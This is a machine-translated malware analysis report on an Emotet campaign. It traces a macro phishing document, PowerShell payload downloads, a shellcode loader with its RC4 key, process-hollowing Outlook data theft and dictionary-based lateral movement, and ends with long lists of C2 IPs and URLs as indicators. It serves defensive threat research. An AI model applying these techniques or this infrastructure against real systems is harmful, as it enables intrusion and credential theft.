Shulou(Shulou.com)06/02 Report--

Overview

Emotet is a kind of bank Trojan horse spread by email, luring users to click and execute malicious code. It was first discovered in 2014 and has been continuously active so far. It also has some influence in China. Its active anti-soft confrontation strategy makes it a difficult opponent.

Qianxin virus response Center issued an Emotet threat warning on September 23, 2019. After long-term tracking, Qianxin virus response Center recently found several Emotet harpoon attack emails with malicious macro code. The mail executes the macro code by inducing users to click enable macros, and uses PowerShell to download and execute the next phase of the attack payload. The specific attack module functions include OutLook data theft and horizontal penetration module.

The sample execution process is as follows:

Sample analysis document analysis

The bait document is written in English and the display prompts the user to enable macros:

When the user enables the macro, the AutoOpen is automatically executed, triggering the macro code. A piece of Base64-encoded PowerShell code is eventually decoded in AutoOpen, and then PowerShelll is called to execute the Base64 code.

The Base64 code and the decoded data are as follows:

After collating the decoded Base64 data, it is found that the code will attempt to download the next phase attack payload from five different servers, and execute the attack payload if the download is successful.

The attack payload hosting server used this time has a sunken host, which is also used by Emote to avoid killing.

EmotetLoader analysis

The sample reference compilation time is October 7, 2019. From the data of Qianxin virus response Center, we can see that the domestic resolution timelines of the five URL visited by the PowerShell began on October 26.

The sample is written based on MFC, and the functional code is implemented in the export function. After the window is created, the export function nZzNNxCMObNaV is called through the message handling function.

The function names called in the nZzNNxCMObNaV export function are all dynamically obtained from the function address and then called, and the function name is obtained through the resource ID.

Then use RC 4 to decrypt ShellCode to execute, the key is (vGdOmmadpKaisrM):

ShellCode Analysis of encryption in Loader

The decrypted ShellCode contains a PE file and is loaded in memory, and the DLL reference compile time is October 18:

After getting the command line argument, it is compared with "--b57a4fbf" to determine whether the specified parameter exists, and if not, the given parameter restarts itself and exits the current process:

Get the disk serial number after starting with parameters:

Format the serial number as a parameter to Mutex:

Create a Mutex with the name "Global\ I90D2908D":

And Mutex: "Global\ M90D2908D":

And Mutex: "Global\ E90D2908D":

Map your own file into memory and calculate the value of CRC32:

Get the computer name:

Create a service named "sketchflow" and start the service sketchflow.exe, which copies itself to the system32 directory, and then the process invokes ExitProcess to exit.

If a failure to call OpenSCManager before creating the server indicates that it is currently impossible to maintain self-startup through the service, the purpose of the persistence attack will be maintained through the Run registry:

Call the system API to get the current system information:

Get the current process SessionID through the PEB structure:

Enumerate processes:

Format the online URL:

Call Http series functions to communicate with the server:

If the communication is successful, the InternetReadFile is called to read the data from the server, and if the communication fails, the above steps are cycled through WaitForSingleObject after waiting for 4571ms.

Call CryptDecrypt to decrypt:

Apply for space and create a thread in memory to load the attack load downloaded from the server after repairing the import table:

There are three ways to process data after downloading from the server:

The first writes the data directly to the file and invokes the CreateProcess execution plug-in:

The second is that after writing to the file, you can create processes under different Session:

The third is to call CreateThread directly to execute ShellCode:

Qianxin virus response Center found another version of EmotetLoader sample in its continuous attention to Emotet, which made a new change in the processing of internal encrypted ShellCode while the basic function of EmotetLoader remained unchanged.

One way is to save the encrypted ShellCode in an array, the other is to place the encrypted ShellCode in the resource data, and obtain the resource and decrypt the data through a series of API such as FindResourceA.

The sample captured this time actually contains two attack modules in the PayLoad downloaded from the server. One module is to steal OutLook data, and the other is to penetrate horizontally.

PayLoad Analysis of Server request

The PayLoad downloaded from the server is executed through the method of creating a thread, and the code Dump later found to be a DLL, with a reference compilation time of October 15, 2019.

To execute the DLLMain code, you will first try to delete the file in the Temp directory, which is created by the injection into the child process, and the obtained OutLook information is saved in the file:

Apply for space and release code in memory that is ready to be injected into the process:

Create a suspended process itself, with the parameter being the file path where the acquired OutLook data is saved:

Apply for space for the child process, and call GetThreadContext to obtain the context information of the child process. The data of the original child process is mapped to the location of the 0x400000:

Write the previously released DLL in memory to the child process, and call SetThreadContext to set the child process's EIP to execute the injected code:

The address written into the child process is 0x40000, that is, the address mapped by the module when the child process program is initialized, and the address is written by calling WriteProcessMemory, overwriting the original data. The injection technology is a typical Process Hollowing.

Because the child process is suspended when the child process starts, the value of executing RtlUserThreadStart,EAX when the thread resumes points to the OEP of the injected DLL where the thread starts to execute.

Then wait for the process to finish executing and exit, and read the data from the Temp file:

The connection server sends the data and waits for the data to return:

Analysis of module 1 injected into the process

The module is a DLL that is injected into the child process through SetThreadContext, and the reference compilation time is March 31, 2019.

After the DLL starts, it queries the registry DLLPathEx key of OutLook for information:

Create a file in the Temp directory that is responsible for saving information about the read OutLook:

The PayLoad gets the OutLook data content:

Get it and format it, write it to the Tmp file, and then the process exits:

Module 2 analysis

The module is executed directly in memory through a thread.

After the module starts, it gets the computer name and the current process name, and decrypts the dictionary of the account number and password in memory.

The decrypted password dictionary is as follows:

Enumerate the network resources in the current network environment

Try to connect to the target server using a dictionary, and if successful, copy your own files to the target machine, and start the process through the server to achieve horizontal penetration:

Summary

Qianxin virus response Center found multiple homologous samples, and the Loader used in the samples and the PayLoad downloaded from the server are different, which does not rule out the fact that the attackers behind the Emotet are avoiding homologous detection of similar samples while improving the function of the samples. From the sample behavior, the main purpose of this attack is to obtain user computer information, OutLook data and horizontal penetration, and the attacker may be laying the groundwork for subsequent in-depth attacks.

Qianxin virus response Center reminds users not to easily open unknown emails to raise security awareness. Prevent such malicious sample attacks.

At present, Qianxin Group's full range of products, including Sky Rock, Sky Eye, SOC, situational Awareness, and threat Intelligence platform, support the detection of attacks related to the report.

IOCs

Hxxp://www.encitmgdk.com/wp-content/jz9j7hptcw-bgwvnoaacn-64826306/

Hxxp://new.1communityre.com/wp-admin/NhwvCC/

Hxxps://simplecuisine.000webhostapp.com/wp-admin/UOdPpFk/

Hxxps://ejerciciosantonio.000webhostapp.com/wp-admin/yds9q9bnpj-gp81uc99l-661630/

Hxxps://edu.tizino.com/wvcly/uvsMEaKW/

96.20.84.254

45.56.122.75

85.25.92.96

94.177.253.126

189.166.13.109

212.112.113.235

216.70.88.55

138.186.179.235

95.216.207.86

176.58.93.123

189.132.130.111

75.154.163.1

60.52.64.122

181.36.42.205

143.95.101.72

203.99.188.11

70.45.30.28

110.36.234.146

190.117.206.153

190.55.39.215

186.84.173.153

187.143.219.242

181.47.235.26

185.45.24.254

190.13.146.47

5.189.148.98

190.217.1.149

200.55.168.82

154.120.227.206

162.241.134.130

190.228.212.165

91.109.5.28

190.96.118.15

70.32.94.58

83.169.33.157

190.113.146.128

144.76.62.10

201.217.113.58

216.75.37.196

181.61.143.177

211.229.116.130

157.7.164.178

186.92.11.143

203.99.187.137

187.188.166.192

203.99.188.203

190.16.101.10

201.196.15.79

113.52.135.33

186.109.91.136

189.218.243.150

42.190.4.92

178.249.187.150

138.197.140.163

51.38.134.203

23.253.207.142

186.146.110.108

152.170.220.95

200.90.86.170

192.241.220.183

172.104.70.207

181.197.2.80

Http://111.119.233.65/codec/site/

Http://190.210.184.138/ban/

Http://51.255.165.160/loadan/enabled/raster/merge/

Http://45.56.79.249/arizona/

Http://163.172.40.218/health/

Http://91.205.215.57/stubs/symbols/raster/merge/

Http://68.183.170.114/iab/arizona/raster/merge/

Http://190.217.1.149/site/add/

Http://62.75.160.178/child/sess/

Http://200.113.106.18/publish/iab/raster/

Http://5.196.35.138/devices/prov/raster/

Http://89.188.124.145/prep/devices/raster/

Http://89.188.124.145/vermont/srvc/

Http://186.23.132.93/entries/ban/scripts/merge/

Http://51.15.8.192/loadan/sym/

Http://190.38.14.52/usbccid/cone/scripts/merge/

Http://217.199.160.224/usbccid/

Http://207.154.204.40/report/xian/scripts/

Http://142.93.114.137/health/prep/

Http://94.183.71.206/iplk/

Http://190.104.253.234/pnp/balloon/scripts/

Http://212.71.237.140/bml/teapot/scripts/

Http://201.163.74.202/publish/scripts/scripts/merge/

Http://201.190.133.235/bml/usbccid/

Http://186.15.57.7/scripts/child/

Http://86.42.166.147/acquire/

Http://82.196.15.205/cookies/

Http://186.68.141.218/taskbar/ringin/

Http://46.28.111.142/scripts/

Http://138.68.106.4/health/cookies/scripts/merge/

Http://190.10.194.42/child/codec/scripts/merge/

Http://104.131.58.132/guids/ban/scripts/merge/

Http://104.131.58.132/guids/ban/scripts/merge/

Http://190.230.60.129/badge/entries/

Http://109.169.86.13/guids/

Http://181.44.166.242/merge/tlb/scripts/

Http://46.41.151.103/sess/xian/scripts/

Http://144.139.158.155/devices/sess/scripts/

Http://183.82.97.25/psec/chunk/scripts/merge/

Http://149.62.173.247/raster/devices/scripts/

Http://81.169.140.14/xian/splash/

Http://190.230.60.129/enable/acquire/scripts/merge/

Http://190.230.60.129/enable/acquire/scripts/merge/

Http://77.245.101.134/child/between/scripts/merge/

Http://46.29.183.211/acquire/

Http://68.183.190.199/balloon/

Http://220.241.38.226/guids/arizona/scripts/

Http://45.79.95.107/attrib/xian/

Http://200.58.83.179/balloon/srvc/

Http://190.97.30.167/schema/vermont/scripts/

Http://178.79.163.131/symbols/devices/scripts/merge/

Http://77.55.211.77/badge/splash/scripts/merge/

Http://201.213.32.59/site/acquire/scripts/merge/

Http://79.143.182.254/teapot/

Http://14.160.93.230/stubs/entries/scripts/

Http://178.249.187.151/entries/report/scripts/

Http://190.182.161.7/pdf/arizona/

Http://181.59.253.20/ringin/jit/scripts/merge/

Http://139.5.237.27/results/ringin/scripts/

Http://154.120.227.206/ringin/iab/scripts/

Http://91.83.93.124/chunk/vermont/

Http://181.16.17.210/stubs/cookies/

Http://80.85.87.122/jit/balloon/scripts/merge/

Http://119.59.124.163/badge/tpt/

Http://190.230.60.129/site/raster/scripts/

Http://181.135.153.203/cab/enabled/scripts/

Http://185.86.148.222/usbccid/entries/

Http://46.101.212.195/devices/taskbar/scripts/merge/

Http://200.113.106.18/usbccid/symbols/scripts/

Http://50.28.51.143/splash/

Http://86.6.188.121/report/chunk/

Http://62.75.143.100/between/prov/scripts/merge/

Http://81.213.215.216/guids/iplk/

Http://181.36.42.205/acquire/

Http://186.1.41.111/attrib/

Http://203.25.159.3/sess/

Http://79.127.57.43/jit/window/

Http://69.163.33.84/vermont/bml/scripts/merge/

Http://190.146.131.105/prep/

Http://87.106.77.40/symbols/

Http://91.204.163.19/walk/ringin/scripts/

Http://94.177.183.28/codec/publish/

Http://111.119.233.65/enabled/

Http://190.210.184.138/enabled/iplk/scripts/merge/

Http://51.255.165.160/forced/

Http://45.56.79.249/badge/site/

Http://163.172.40.218/arizona/walk/scripts/

Http://68.183.170.114/badge/merge/scripts/

Http://68.183.170.114/badge/merge/scripts/

Http://62.75.160.178/usbccid/taskbar/

Http://200.113.106.18/json/forced/scripts/

Http://89.188.124.145/sym/img/scripts/

Http://186.23.132.93/badge/prep/scripts/merge/

Http://51.15.8.192/ringin/vermont/scripts/merge/

Http://190.38.14.52/json/devices/scripts/merge/

Http://217.199.160.224/cookies/splash/scripts/merge/

Http://207.154.204.40/attrib/json/raster/

Http://207.154.204.40/attrib/json/raster/

Http://94.183.71.206/glitch/enabled/raster/

Http://212.71.237.140/between/taskbar/raster/merge/

Http://201.163.74.202/loadan/loadan/

Http://201.190.133.235/odbc/img/

Http://186.15.57.7/cab/srvc/raster/

Http://86.42.166.147/scripts/attrib/

Http://82.196.15.205/report/devices/

Http://186.68.141.218/attrib/tpt/raster/

Http://46.28.111.142/attrib/json/

Http://138.68.106.4/forced/window/raster/

Http://190.10.194.42/splash/

Http://104.131.58.132/schema/cone/raster/

Http://190.96.118.15/health/report/raster/

Http://190.230.60.129/loadan/xian/

Http://109.169.86.13/cone/

Http://181.44.166.242/enabled/chunk/raster/

Http://46.41.151.103/schema/iplk/

Http://144.139.158.155/sym/badge/raster/

Http://183.82.97.25/jit/

Http://149.62.173.247/health/pnp/

Http://81.169.140.14/loadan/enabled/raster/

Http://190.230.60.129/symbols/

Http://159.203.204.126/acquire/child/raster/

Http://77.245.101.134/publish/symbols/raster/merge/

Http://46.29.183.211/balloon/pdf/raster/merge/

Http://68.183.190.199/json/chunk/raster/

Http://220.241.38.226/jit/vermont/

Http://45.79.95.107/chunk/devices/

Http://190.97.30.167/srvc/health/raster/merge/

Http://178.79.163.131/results/walk/raster/

Http://190.120.104.21/acquire/raster/

Http://77.55.211.77/iplk/enabled/

Http://201.213.32.59/health/between/raster/merge/

Http://79.143.182.254/report/cone/raster/merge/

Http://14.160.93.230/schema/arizona/raster/

Http://178.249.187.151/child/xian/

Http://190.182.161.7/between/

Http://181.59.253.20/srvc/prov/raster/merge/

Http://139.5.237.27/scripts/cookies/raster/

Http://154.120.227.206/codec/balloon/raster/

Http://91.83.93.124/cookies/splash/

Http://181.16.17.210/enable/json/raster/merge/

Http://80.85.87.122/rtm/

Http://119.59.124.163/ringin/usbccid/

Http://190.230.60.129/iplk/

Http://181.135.153.203/loadan/

Http://185.86.148.222/loadan/tlb/raster/"

Http://46.101.212.195/prov/

Http://200.113.106.18/window/

Http://201.184.41.228/stubs/enable/

Http://50.28.51.143/window/

Http://86.6.188.121/arizona/balloon/raster/merge/

Http://62.75.143.100/prep/tpt/raster/

Http://81.213.215.216/loadan/json/

Http://181.36.42.205/entries/

Http://186.1.41.111/enable/glitch/raster/merge/

Http://203.25.159.3/cab/

Http://79.127.57.43/loadan/forced/raster/

Http://69.163.33.84/raster/pdf/raster/

Http://41.75.135.93/tlb/nsip/

Http://190.146.131.105/arizona/publish/raster/merge/

Http://87.106.77.40/raster/vermont/raster/merge/

Http://91.204.163.19/prep/iplk/raster/merge/

Http://94.177.183.28/vermont/odbc/

Http://51.254.218.210/iab/attrib/acquire/merge/

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.